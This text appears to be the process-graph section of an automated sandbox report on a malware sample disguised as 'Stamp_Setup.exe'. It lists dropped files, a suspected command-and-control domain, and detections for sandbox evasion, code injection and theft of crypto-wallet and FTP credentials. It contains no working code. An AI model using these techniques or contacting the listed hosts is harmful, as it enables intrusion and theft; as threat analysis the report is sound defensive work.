cmd.exe 26->39         started        184 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->184 186 Machine Learning detection for dropped file 31->186 188 Contains functionality to inject code into remote processes 31->188 190 Injects a PE file into a foreign processes 31->190 42 Ryu8yUx.exe 31->42         started        45 WerFault.exe 31->45         started        192 Antivirus detection for dropped file 33->192 194 Detected unpacking (changes PE section rights) 33->194 196 Tries to detect sandboxes and other dynamic analysis tools (window names) 33->196 198 Tries to evade debugger and weak emulator (self modifying code) 33->198 202 3 other signatures 35->202 47 conhost.exe 37->47         started        file10 signatures11 process12 dnsIp13 166 Uses ping.exe to sleep 39->166 49 Stamp_Setup.exe 39->49         started        52 conhost.exe 39->52         started        54 chcp.com 39->54         started        56 PING.EXE 39->56         started        124 modernakdventure.cyou 188.114.96.3, 443, 51681, 51682 CLOUDFLARENETUS European Union 42->124 168 Query firmware table information (likely to detect VMs) 42->168 170 Found many strings related to Crypto-Wallets (likely being stolen) 42->170 172 Tries to harvest and steal ftp login credentials 42->172 174 2 other signatures 42->174 signatures14 process15 file16 96 C:\Users\user\AppData\...\Stamp_Setup.tmp, PE32 49->96 dropped 58 Stamp_Setup.tmp 49->58         started        process17 file18 98 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 58->98 dropped 100 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 58->100 dropped 102 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 58->102 dropped 61 Stamp_Setup.exe 58->61         started        process19 file20 108 C:\Users\user\AppData\...\Stamp_Setup.tmp, PE32 61->108 dropped 64 Stamp_Setup.tmp 61->64         started        process21 file22 88 C:\Users\user\AppData\Roaming\is-DKJ0H.tmp, PE32+ 64->88 dropped 90 C:\Users\user\AppData\...\9mpr_8.ocx (copy), PE32+ 64->90 dropped 92 C:\Users\user\AppData\...\unins000.exe (copy), PE32 64->92 dropped 94 4 other malicious files 64->94 dropped 67 regsvr32.exe 64->67         started        process23 process24 69 regsvr32.exe 67->69         started        dnsIp25 116 github.com 140.82.121.3 GITHUBUS United States 69->116 118 raw.githubusercontent.com 185.199.111.133 FASTLYUS Netherlands 69->118 120 cdn.discordapp.com 162.159.133.233 CLOUDFLARENETUS United States 69->120 158 System process connects to network (likely due to code injection or exploit) 69->158 160 Suspicious powershell command line found 69->160 162 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 69->162 164 3 other signatures 69->164 73 powershell.exe 69->73         started        signatures26 process27 signatures28 176 Loading BitLocker PowerShell Module 73->176

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.